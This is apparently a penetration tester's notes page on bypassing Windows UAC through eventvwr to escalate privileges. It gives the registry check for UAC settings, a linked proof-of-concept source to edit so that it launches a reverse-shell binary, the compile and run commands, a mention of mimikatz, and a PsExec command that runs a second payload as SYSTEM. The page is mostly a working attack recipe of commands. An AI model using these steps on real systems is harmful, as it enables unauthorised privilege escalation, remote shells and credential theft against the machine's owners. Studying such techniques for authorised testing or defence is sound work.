UAC eventvwr

PreviousWindows NextMetasploit

Last updated 1 year ago

Check if UAC is On

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

ConsentPromptBehaviorAdmin    REG_DWORD    0x5
EnableLUA    REG_DWORD    0x1
PromptOnSecureDesktop    REG_DWORD    0x1

EnableLUA tells us whether UAC is enabled. If 0 we don’t need to bypass it at all can just PsExec to SYSTEM. If it’s 1 however, then check the other 2 keys
ConsentPromptBehaviorAdmin can theoretically take on 6 possible values (readable explanation here), but from configuring the UAC slider in Windows settings it takes on either 0, 2 or 5.
PromptOnSecureDesktop is binary, either 0 or 1.

When 2. & 3. is default or lower ( not work when `ConsentPromptBehaviorAdmin` = 2 and `PromptOnSecureDesktop` = 1)

https://github.com/turbo/zero2hero/raw/master/main.c

GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\rev1.exe");

x86_64-w64-mingw32-gcc main.c -o 64.exe
64.exe -c rev1.exe
>>can use mimi alrdy
PSexec with high integrity shell to system 
PsExec64.exe -accepteula -d -s C:\rev2.exe